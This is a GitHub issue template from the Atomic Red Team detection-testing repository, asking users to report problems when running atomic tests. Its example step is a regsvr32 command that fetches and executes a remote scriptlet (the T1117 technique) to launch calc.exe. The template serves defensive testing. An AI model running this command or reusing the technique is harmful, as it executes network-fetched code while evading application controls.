Files
atomic-red-team/.github/ISSUE_TEMPLATE/problem_report.md
Keith McCammon a42a1a6339 Improve issue templates via title prefixes (#1121)
* Update and rename feature_request.md to idea.md

* Update problem_report.md

* Update website_change.md

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2020-07-15 11:38:11 -06:00

1.0 KiB
Raw Permalink Blame History

name, about, title, labels, assignees
name about title labels assignees
Problem Tell us about a problem you've encountered. Problem: problem

What did you do?

Please replace this with what you did. e.g. Run regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll

What did you expect to happen?

Please replace this with what you expected to happen. e.g. The atomic test executes and calc.exe is launched.

What happened instead?

Please replace this with of what happened instead. e.g. 💥

Your Environment

  • Which specific operating system are you running (e.g. Windows 7 SP1 32-bit)?
  • Did you run the test from an elevated or root prompt?
  • If relevant, which atomic test is this specific to?
  • If relevant, which execution harness are you attempting to use?